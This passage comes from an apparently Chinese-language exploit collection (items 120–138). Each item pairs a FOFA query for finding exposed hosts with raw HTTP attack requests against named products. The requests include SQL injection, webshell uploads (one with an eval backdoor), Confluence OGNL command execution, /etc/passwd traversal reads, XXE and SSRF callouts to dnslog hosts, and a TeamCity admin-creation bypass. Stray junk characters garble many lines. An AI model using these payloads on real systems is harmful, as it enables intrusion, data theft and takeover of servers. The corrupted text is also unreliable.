Content-Type: application/x-www-form-urlencoded;& ?' K" D* R4 l+ f) F# j
Content-Length: 109
% x- e+ n% W. X. S kOrigin: https://58.18.133.60:8443
: @2 L7 _! w3 L7 `4 VReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php0 P" ]2 j4 Y+ z. L! r- E4 W& E- r
Sec-Fetch-Dest: empty2 k; h! A8 U/ v1 c- N
Sec-Fetch-Mode: cors! f/ v" r8 \7 v2 i R# ] V
Sec-Fetch-Site: same-origin
# T4 h' N+ e9 ]. R$ h. S$ ], H/ aX-Forwarded-For: 1.1.1.1
' C2 G6 n( x6 x7 YX-Originating-Ip: 1.1.1.1$ m. \. d8 h& G/ C8 ?! ?( K
X-Remote-Ip: 1.1.1.13 q5 P8 k S8 Y$ T1 O y
X-Remote-Addr: 1.1.1.1
5 L( o5 _3 n: w" y9 rTe: trailers4 T$ c' O+ n7 K5 m$ P5 a: R
Connection: close, z! x5 F/ x- ~
' Z" I' {* H$ W! r" a
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456; g! b, ^$ G T- O; E$ X! {
; T3 k; M( @* n% O$ W' y) h
- u1 r$ s t4 l; A, s Z0 [120. 北京百绰智能S40管理平台导入web.php任意文件上传
1 P' _2 i& h/ K# u& ?CVE-2024-1253
, S4 f' v2 m KFOFA:title="Smart管理平台"9 ` [" } \, Z; }5 d; f1 w$ [8 B
POST /useratte/web.php? HTTP/1.1' X% d o7 e% U/ g# B
Host: ip:port; H ^" U! _( R. {
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
: H- B6 e* ^4 z8 jUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko! `( _: } q& ^% F4 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* V5 N" h" g$ s& ~9 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 i8 W% f. j! \! l kAccept-Encoding: gzip, deflate7 k# P) {8 p+ Y4 {8 p' V) d
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 E9 ]$ S9 G! D1 H" \
Content-Length: 5970 n5 L- f' d! D) P6 ^
Origin: https://ip:port
- G: W- m+ C- t% ~/ s: r: B+ @' d4 G; nReferer: https://ip:port/sysmanage/licence.php
% v+ E2 z* Y0 n, \, c. ^7 N8 W ^$ TUpgrade-Insecure-Requests: 13 I' Q L, L$ J2 O) O3 `
Sec-Fetch-Dest: document" J. O* H1 _( G( i; ?9 S$ {0 S1 y
Sec-Fetch-Mode: navigate
" h4 |& b$ E4 ^6 { V0 G/ oSec-Fetch-Site: same-origin
( ?0 z: O7 O4 q/ q3 p, W# @Sec-Fetch-User: ?1
. V9 ^2 y+ D- D! qTe: trailers
6 S* B6 m( h' ?2 hConnection: close
: v; P4 o; ^5 y
% D. }6 i5 f4 k ~4 j s( \& J) o# v) e-----------------------------423289041236658752706300793288 D8 y7 q# h, g/ N& N( ^( q
Content-Disposition: form-data; name="file_upload"; filename="2.php"& ^4 {+ Q* k* U \
Content-Type: application/octet-stream. e) ]4 d& L: R
$ E' O' \/ {. s& k# ^<?php phpinfo()?>$ t* i7 @8 B3 K1 g3 a! v! _% l
-----------------------------42328904123665875270630079328' ^& @& q/ ^( c+ e
Content-Disposition: form-data; name="id_type"' r5 N& s4 ~6 z1 r( Z" L# g1 j( ^
1 v+ B& C0 r _! e' q5 L
1
/ B+ W+ D; l) e-----------------------------42328904123665875270630079328
# N+ e" N' s$ }1 f5 Y8 l3 eContent-Disposition: form-data; name="1_ck"
# F' A! C5 i0 W7 n" s% @% |% e q4 o$ o) e
1_radhttp
0 u. _1 W4 F+ t9 u+ m H-----------------------------42328904123665875270630079328) {4 L/ Q' K. V1 c. @! L, H4 y
Content-Disposition: form-data; name="mode". v; x+ f! G. o$ v5 f8 Q* S& U
; N# b! {' R- M. _; e `import9 ?) B4 K8 d y5 G( u! K& ~
-----------------------------42328904123665875270630079328( H# b$ g! B5 l) U o) Q
$ e& ]" O" P# B3 G: {" S
. c* D% Z- L$ O2 F' A+ \1 ?. D
文件路径/upload/2.php
: j8 I3 N" d2 ], y* K4 L7 H$ \4 x, Y: A9 S9 w
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
9 U0 K, L7 t+ m* f; s" MCVE-2024-1918! l1 A. g- I4 T# T
FOFA:title="Smart管理平台"
: P8 v4 m U; \3 e d: HPOST /useratte/userattestation.php HTTP/1.1
& u9 ~$ \9 b7 F$ `1 _9 p" n! KHost: 192.168.40.130:84430 c( k' c! ] L" h8 _+ s
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
) p; A2 z6 O+ qUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko$ f. G$ _- e' I6 \6 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 i3 L4 V5 r3 o) o& `7 ~/ G' b& D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% ~ { V2 j+ v4 v
Accept-Encoding: gzip, deflate% e7 [7 u- k5 p/ R! L% t
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793284 `' L7 q" E* R/ K8 v3 y3 }
Content-Length: 592% A ^% W) G; r$ a+ Q
Origin: https://192.168.40.130:8443
; d& x. s( q6 _ C* F) g/ HUpgrade-Insecure-Requests: 15 v$ v9 a/ w8 o5 R5 l2 q& H8 ^; j
Sec-Fetch-Dest: document# f9 k1 }! n" k; G1 d# o( y
Sec-Fetch-Mode: navigate
* C! c0 s& K9 D/ k+ V0 r- h3 jSec-Fetch-Site: same-origin. ?/ Z Y- C* C( F# R
Sec-Fetch-User: ?1
+ j# s" U/ X% R R, sTe: trailers
+ B8 K: R3 \8 y! O0 \Connection: close
! K" H* H1 a" a2 S7 _& g0 C% K
' {6 L$ c- O% @* _- M, M-----------------------------42328904123665875270630079328
2 a% e8 S+ h/ A' Z5 nContent-Disposition: form-data; name="web_img"; filename="1.php"
" D: j- D$ H8 L( ~5 f( w+ P5 HContent-Type: application/octet-stream
; _, ~4 R0 F* @. o9 f0 @" |$ I: y2 [
<?php phpinfo();?>7 R, v1 `7 z( o& m) L D% O& p$ K
-----------------------------42328904123665875270630079328: M; z0 C2 Q& y; t7 Z( @# c
Content-Disposition: form-data; name="id_type"
! X q& W* |7 t* Y
% S J v6 r" G; C! s0 g1
" e7 S! V# Z! N6 C* l4 T-----------------------------42328904123665875270630079328
- q. u) a( Q0 B% p6 a. RContent-Disposition: form-data; name="1_ck"
, `- i( m, i* o O% [% T5 Z8 _
& e+ E9 D) T/ j: c! s1 x$ c1_radhttp
& [6 |4 I5 M; E" q6 Q# r1 C-----------------------------423289041236658752706300793288 M% }/ @" r) u$ g! b# w% c4 n) i2 ~$ F
Content-Disposition: form-data; name="hidwel"9 R$ G: A; t) }7 ]/ s. y
. x; W9 x. u( j. jset
1 L$ R7 o% X- C5 f/ c2 }4 w1 Z-----------------------------42328904123665875270630079328
, Y6 m( W) u! s2 p3 x' \4 N, z' \$ |" {4 E4 C7 s
' w I* C: p S1 v' x
boot/web/upload/weblogo/1.php0 L) e! D6 f2 a* |. \7 `& L
8 T$ n7 ^$ s) B8 q7 `' Z+ j122. 北京百绰智能s200管理平台/importexport.php sql注入( T8 o) S% h( H3 _ A8 j
CVE-2024-27718FOFA:title="Smart管理平台"
& I9 a A7 l. y% t _0 G: t其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()# R p# H& S. ~3 {2 A8 X2 h
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
0 r: N* K- `% a2 T9 fHost: x.x.x.x
& K! }; F1 }8 g" \# m* qCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc06 N, m! D; ~+ Q. l; S* E9 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 T( \2 H q# Q- \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; k' d% Z- e# j7 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 W v1 f0 E; K; KAccept-Encoding: gzip, deflate, br7 K- V! e6 {0 }6 b4 l, G
Upgrade-Insecure-Requests: 1
. T2 d9 b! T) x: N2 [$ _- z8 bSec-Fetch-Dest: document
( C+ u% G! l8 J+ \Sec-Fetch-Mode: navigate! V: w& B- R7 F: O; Z. l, h6 Y
Sec-Fetch-Site: none
/ ~4 b% q6 z( g/ n ^% qSec-Fetch-User: ?10 U0 t4 ~! U$ I {0 D+ [
Te: trailers" n) A( o+ h1 {# H
Connection: close! m4 s% M: U- s' W
1 {5 N/ g& E0 |# b* u2 q
" {/ h0 S. V* ?, j3 q% \! I6 W$ A* o123. Atlassian Confluence 模板注入代码执行; h, x+ M: q i
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"* `. X/ G& r$ V
POST /template/aui/text-inline.vm HTTP/1.1
- S. Z3 H: P5 D+ u" O- J4 u. kHost: localhost:8090
, z8 U* S- E1 \1 rAccept-Encoding: gzip, deflate, br: O0 R7 _ j% Q# F6 o* w2 r$ g% R- [
Accept: */*
( n6 y: ]9 M6 U) HAccept-Language: en-US;q=0.9,en;q=0.8" ^+ H8 w) W1 b% b# l: _1 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
& T0 J- C; a0 w3 B8 oConnection: close
) p2 b# [, g" }- f7 bContent-Type: application/x-www-form-urlencoded% A4 c: M- h. m% ~" u. x
2 I+ s9 l4 J: w* J. slabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
% _* J$ q+ l: }# {/ X6 w; i) f6 F. ?% w# y8 G) j' ~- c2 x7 h3 |
, X( \9 i9 T" E6 A+ ~* \" h
124. 湖南建研工程质量检测系统任意文件上传
9 l' _. W% P( [FOFA:body="/Content/Theme/Standard/webSite/login.css"
9 f( m$ P8 g' n( B% K+ BPOST /Scripts/admintool?type=updatefile HTTP/1.1( W, T" L4 W9 q% I' [3 p" m
Host: 192.168.40.130:8282
' A( N6 @; p& u2 m% K1 TUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Y, V9 R& M ^1 l; w
Content-Length: 72 P$ a% n2 P. @& s9 K; w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8+ I. C) z* L! s) ~
Accept-Encoding: gzip, deflate, br
/ W U3 M% q4 Z7 i0 L& WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 }- y" Q& X( {4 i- f* G6 mConnection: close; V% W! Y5 e# X5 h! E: O
Content-Type: application/x-www-form-urlencoded) Y2 c% `. S9 i, M7 H3 G
; r! p C3 j# B4 lfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
* ]% j' |9 C- Q# p) q% @7 w
2 d' h& h* g4 g! M- M
0 ~+ Z5 w" E; Uhttp://192.168.40.130:8282/Scripts/abcgcg.aspx$ P3 b, g- w7 S# x
R w( W1 m4 _( S/ o! x& R125. ConnectWise ScreenConnect身份验证绕过
( Y8 P9 R) O; mCVE-2024-17094 h- }! V4 B! M% p; |8 D
FOFA:icon_hash="-82958153"
; m" h6 J8 D; I- Mhttps://github.com/watchtowrlabs ... bypass-add-user-poc
0 M: t+ H: j1 C Z( H
, C. n+ ]' r) ?: B8 m+ W' d" g r; z" O& ~5 S2 Z3 D
使用方法
6 P* M1 }6 S) o: R I5 _python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
7 t. w. J+ d0 y$ R# l7 Q w' E3 \ O8 L
6 L, y9 O- Q7 Q3 Y3 C创建好用户后直接登录后台,可以执行系统命令。( _( y" W0 g/ o" d/ L. U" V/ H" M) P! E2 U
; N% F+ G, h! q L+ q0 J126. Aiohttp 路径遍历
! n, C) S( c8 m$ [FOFA:title=="ComfyUI"
. b0 e5 T! y' zGET /static/../../../../../etc/passwd HTTP/1.10 d+ h Y4 j4 U* F* j# I# o5 k, Z* F
Host: x.x.x.x, {+ F8 g5 g7 z0 e6 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: c7 o8 h+ |, {- z- m9 Y9 B# JConnection: close
% q v, E' v( w+ JAccept: */*! ?+ J" f/ M Z$ Y' [
Accept-Language: en9 H# m2 o; ~! J, ~9 I+ h' y
Accept-Encoding: gzip
1 ?) U \2 y! K( f" T9 G
7 |& a. Z$ `& ~3 b9 S; |
6 Z: `( X* X8 R, ?127. 广联达Linkworks DataExchange.ashx XXE
7 x: z: t4 ^8 `( @FOFA:body="Services/Identification/login.ashx"
3 ^- ?- r7 ~3 H. c* c. rPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
. h% A5 ~/ B- S+ D, {Host: 192.168.40.130:88883 [, L; U" u# X+ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
0 f( H8 z' }! @/ eContent-Length: 415
" m/ e5 S2 h' w( ~5 Z% r1 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( A' T8 z7 A. A8 y
Accept-Encoding: gzip, deflate
7 j+ R$ W) \$ I+ t6 b G( W! iAccept-Language: zh-CN,zh;q=0.9: N+ b; F7 h* A R: G" t' z
Connection: close
+ J! \0 S* v% V4 K; Q$ J. g$ xContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
7 M5 m& g9 M8 ~% EPurpose: prefetch3 X" R' |7 N2 q! w* w
Sec-Purpose: prefetch;prerender
/ |2 X) t2 r c" K4 B- z+ _- r; [) G% X. K2 w. w0 e
------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ M- n" w$ n# O5 @9 ?' b5 g1 SContent-Disposition: form-data;name="SystemName"
! x; d) o A+ u1 i1 A8 S1 W
+ a: p2 ^) Y1 X! {8 G5 ^* u; g0 l uBIM
# [: @+ Q1 B( g2 w0 d------WebKitFormBoundaryJGgV5l5ta05yAIe02 e+ V7 Y1 [7 \. q
Content-Disposition: form-data;name="Params"! g# {% F# y$ a+ Y5 }- @' R2 }- [
Content-Type: text/plain& a4 B2 u P6 L9 o
+ a( u( R4 s/ K( X. h<?xml version="1.0" encoding="UTF-8"?># h# H; k8 T7 |9 x! T
<!DOCTYPE test [* r5 x) E6 |/ @8 G4 V
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
K/ S- j1 K5 L, ?/ i# x]8 e, z+ F8 d5 n3 [- w2 f
>/ R0 \/ s7 Y1 ]5 Q
<test>&t;</test>
8 V6 ~" m" F( F3 x------WebKitFormBoundaryJGgV5l5ta05yAIe0--, X1 x# ^+ e3 U
, O$ f& c0 A9 u. M
; m+ B5 \" E# k0 e; m- y# w8 ~/ Y+ _, s% C* G
128. Adobe ColdFusion 反序列化
8 g i1 p; r* _0 b6 WCVE-2023-38203: ?; @# [! O8 j0 ?
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)3 [, Z4 C' f3 j0 a2 F
FOFA:app="Adobe-ColdFusion"
4 _5 C9 W9 D' J% QPAYLOAD/ c9 n: D4 O9 ^+ Q
) h5 s) u+ b c
129. Adobe ColdFusion 任意文件读取
; i( ~* g' }2 A7 M$ ]CVE-2024-20767
% i7 P3 {+ a" O0 t7 ~! kFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
* g: R$ r0 R1 s1 X第一步,获取uuid( N; Z' k# k& V$ U: q
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
8 P- [3 ?5 O( k0 qHost: x.x.x.x
" x4 r' \# J4 }7 B0 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 D0 I t& p2 |! y' a8 M) X& ?4 gAccept: */*6 m7 q: d. F0 ` _9 E
Accept-Encoding: gzip, deflate5 x" W2 Z# {% Q. d0 n& C7 G7 F, _7 L
Connection: close, ^# R/ f( Y0 y' ^
9 ^1 Q% F( a5 \4 F9 |! h8 U
) k ]9 Z) L$ k1 o5 c& ~/ B第二步,读取/etc/passwd文件
O' P4 d6 A) h2 CGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
+ T# y& t7 r* O- c! i* a1 f! T* VHost: x.x.x.x2 b; x( G7 O: t" g4 G# G: k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! Y% P( {; h; h3 n1 p# F" ?Accept: */*, Z0 k+ X" |0 ^. K! f {
Accept-Encoding: gzip, deflate
' ]; M7 c. U# E. |1 T* R+ I0 mConnection: close
. B( o: E8 j W& J. y# ruuid: 85f60018-a654-4410-a783-f81cbd5000b9
/ t0 D& _' U e& v1 Z P1 Y5 |8 Q6 s* f& I0 o0 ]! G
8 i. G. d% ^3 G7 d3 U, _2 o9 A: r
130. Laykefu客服系统任意文件上传
2 L3 b2 x1 O' ?# N! cFOFA:icon_hash="-334624619"& K- [% d2 n- c D1 ], c9 t, N$ U5 z
POST /admin/users/upavatar.html HTTP/1.18 ~: n; P& D/ Q2 f# O" M
Host: 127.0.0.1' W6 ]- V: E: I+ p9 I
Accept: application/json, text/javascript, */*; q=0.01& b! J; X" o* ?" b: f# G. y/ v
X-Requested-With: XMLHttpRequest
# [/ X: p) x' [7 v& ]2 FUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.265 z; k0 @* Z8 Q+ \5 \( K6 K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
7 `* _ }' I# B& _: zAccept-Encoding: gzip, deflate
, U' u1 e' s+ A% u0 w; xAccept-Language: zh-CN,zh;q=0.97 c& e# ~- ?, O1 n& s
Cookie: user_name=1; user_id=39 g3 K# C7 l6 V1 r8 O& s( u6 f
Connection: close
0 T7 ~( U% U: O1 `7 t" x+ e5 s" j; E1 }) I
------WebKitFormBoundary3OCVBiwBVsNuB2kR
0 c9 c, a4 z- E$ e, C9 B1 bContent-Disposition: form-data; name="file"; filename="1.php"/ o$ ?6 ]4 Z3 \& U
Content-Type: image/png! a6 E) ?: I3 H4 H$ y4 Q
J- d0 k8 n/ C6 [
<?php phpinfo();@eval($_POST['sec']);?>" }/ h u& U2 [) Q( n
------WebKitFormBoundary3OCVBiwBVsNuB2kR--( V+ q; G6 V9 K" O
4 T% U& q, Y# {
) G! D+ u8 Q4 A$ q1 w8 W131. Mini-Tmall <=20231017 SQL注入+ d7 D/ y/ n; f# B
FOFA:icon_hash="-2087517259"
9 L3 h1 l4 z f& ]; }6 q( Q/ s后台地址:http://localhost:8080/tmall/admin6 H, M4 Z! E |# S8 E: ]
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
; z9 I( T# [$ h9 D& T
$ j8 q3 p, P3 \132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
A$ G- R$ s5 A3 JCVE-2024-271983 c" {6 E+ d! X
FOFA:body="Log in to TeamCity"% }2 e% g9 K9 ]
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1' O+ R7 r3 z5 n" e* f0 b
Host: 192.168.40.130:8111
8 g# {7 a7 D3 E1 d- w# hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. z1 R. i" G5 B7 l7 U' X' O8 U
Accept: */*3 n' b8 _* x# L7 z
Content-Type: application/json
3 y9 j! P3 B" a, f- Y& I8 L! VAccept-Encoding: gzip, deflate, m+ Q# V1 p S2 B
/ _1 ]+ P& b/ l' c9 L1 k{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
$ @! X k" z" l9 i# ^
# u7 D, z" n P1 r" W: _2 {" Q" @
/ T" b, s4 }# l% S& o6 B' L) y# ICVE-2024-27199! J/ Z9 G" Z* E% t$ Q y
/res/../admin/diagnostic.jsp) ?: ~" }- b B2 e
/.well-known/acme-challenge/../../admin/diagnostic.jsp% k1 N& q) F6 b# t
/update/../admin/diagnostic.jsp Z/ b: D2 f" R, D
% _4 I; o5 b: y4 N9 \6 _* H& O' i+ h! C7 E v1 c( {/ a* R n
CVE-2024-27198-RCE.py
6 j0 [' P! X2 ?7 j0 p; S& G7 y$ C( e, p/ \4 E" S' x( W" b; h7 B' f# L( [
133. H5 云商城 file.php 文件上传) c: q% l3 \& |
FOFA:body="/public/qbsp.php"6 i { ]+ n; O0 `: h+ T
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
' T7 H0 \3 j4 }! ~Host: your-ip1 P7 I4 _' e" g5 W% a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ X" @0 _5 I( }; O" ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
8 B, ^/ [! X h2 w$ j3 j7 D6 f" ]! N3 {; \5 q- P# o& d0 W
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
3 ?2 D) V; F6 x* e2 p, l8 Z; j9 eContent-Disposition: form-data; name="file"; filename="rce.php"% ~. f/ R/ y4 V% u, n! M. N
Content-Type: application/octet-stream
4 p+ j, [6 `; @2 z" w* G
4 c8 \1 ~6 v, P# t* R$ Z8 n5 n<?php system("cat /etc/passwd");unlink(__FILE__);?>! e; U( ^- X, e9 i
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
9 P5 t6 D( H1 e0 A4 X$ F' m3 M$ K% u. u+ ]
% P3 g+ v4 S+ `7 q9 [8 l; y' ?; }& x
134. 网康NS-ASG应用安全网关index.php sql注入$ A/ O' I: z) ]! _' R' j$ d! ^; \
CVE-2024-2330: i/ n" K4 d$ y6 I$ S
Netentsec NS-ASG Application Security Gateway 6.3版本
5 m5 k: E5 H1 _ c7 TFOFA:app="网康科技-NS-ASG安全网关"
( ]4 x' `- l5 ^/ K9 u3 H- J/ R) c$ fPOST /protocol/index.php HTTP/1.17 E( g* H; j l* M: y' N+ h: c" q! N3 B
Host: x.x.x.x( e% h4 P4 i8 T8 i
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
- q- Y. {3 o# kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. m9 l) N2 W0 y H: N; |3 y& ?Accept: */*
8 Z) Z( j% X- E' \: a+ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" j! j- f( D, F+ C" p9 ^1 R+ R
Accept-Encoding: gzip, deflate& b6 J/ F. B! ~/ L9 H) x
Sec-Fetch-Dest: empty
& f6 N$ d6 ]0 E3 t2 tSec-Fetch-Mode: cors: q- I9 |0 L& L0 s
Sec-Fetch-Site: same-origin
7 a# i4 r! e# w4 ZTe: trailers& @2 h+ G$ l- t) v1 R7 m
Connection: close
* B; q$ Z2 {6 s4 z9 A! NContent-Type: application/x-www-form-urlencoded: ~" z }/ O' f! n7 J! |
Content-Length: 263
) ` P" M V1 E$ j
8 O+ O+ K1 {' n2 P: b7 t2 {jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
5 b1 |# Z; t, L- F! k, U8 X/ m6 |/ @* i! t9 ]
" e) S$ M$ B5 G) c
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
+ Z8 G8 {! C$ j" mCVE-2024-2022
`$ G/ s# b% t' P# F* h) ]5 xNetentsec NS-ASG Application Security Gateway 6.3版本
( ]; F1 k% h, X. i) i# kFOFA:app="网康科技-NS-ASG安全网关"* ~- f. v; e" v! E% l% j
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
& A' \$ g0 C$ T! ^' L- [/ j6 kHost: x.x.x.x
2 i; S, d5 S* w; k6 n; D2 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# l: Z5 B# C0 p% }* b# y+ p, v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' b# ^. t$ e' z
Accept-Encoding: gzip, deflate
" _8 l$ u- D8 u2 n5 tAccept-Language: zh-CN,zh;q=0.9
+ ~7 x8 O: s+ }# ~/ N, F tConnection: close
% x$ M2 a( \: K$ n @( ?
# \) y( u9 s& F+ R, L
4 l' P2 [: p& L8 o* u5 \3 k3 T136. NextChat cors SSRF
% P3 r' T' z; O6 k# P8 qCVE-2023-49785
* Y# k& F' `+ c6 q& c' Y3 MFOFA:title="NextChat"
* i @! f- ~( _" ?* o+ D) `9 HGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
5 \& M2 }% Q [Host: x.x.x.x:10000
5 T* J* u- l5 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( ]% @7 V, o& F ~6 d2 O8 a
Connection: close
5 ~! i9 D0 |6 ], N1 [6 F9 R6 i9 UAccept: */*0 B$ p+ `9 q% i+ R& b
Accept-Language: en
& j6 H( V ]0 {/ o4 O5 bAccept-Encoding: gzip
/ B6 @$ h( s: Y# _* z0 ?" i. x5 B- s7 H8 m" ]8 A3 h
3 ]/ G2 V5 w* q2 a9 P% |
137. 福建科立迅通信指挥调度平台down_file.php sql注入
, M+ _0 G8 S; u, G- PCVE-2024-2620
. F5 \: V( U% A4 Z9 Q# uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 t3 L0 j, I# b- y- e7 G
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
' e- L* M/ a: E8 |5 y( y6 {; c- m" lHost: x.x.x.x
$ ?! F( ^, I# K9 }+ R0 b1 U2 h( pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 ]( p j. Y4 c1 c4 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 k7 F7 }& }* L' B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" y9 m* I( j) E
Accept-Encoding: gzip, deflate, br a9 o. w0 Y$ l7 _5 L7 y
Connection: close A( N: t9 q% ^* z
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj* W; p. \0 i8 P* D
Upgrade-Insecure-Requests: 1
: g' P5 |7 h+ r& @0 L6 M# f; g3 ~9 K; v
?5 \$ M- } V
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& h: l. ^7 U, J" n2 r7 ]CVE-2024-2621
+ Q6 z- e1 C! i- r! Y# EFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 a9 r! s0 j5 L' O2 C
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.13 W; T7 u+ P& }6 m3 U. K
Host: x.x.x.x7 k6 n: x* D! r& P6 q, j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 R8 M3 c8 x( B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: t, N9 V5 Z: S" H
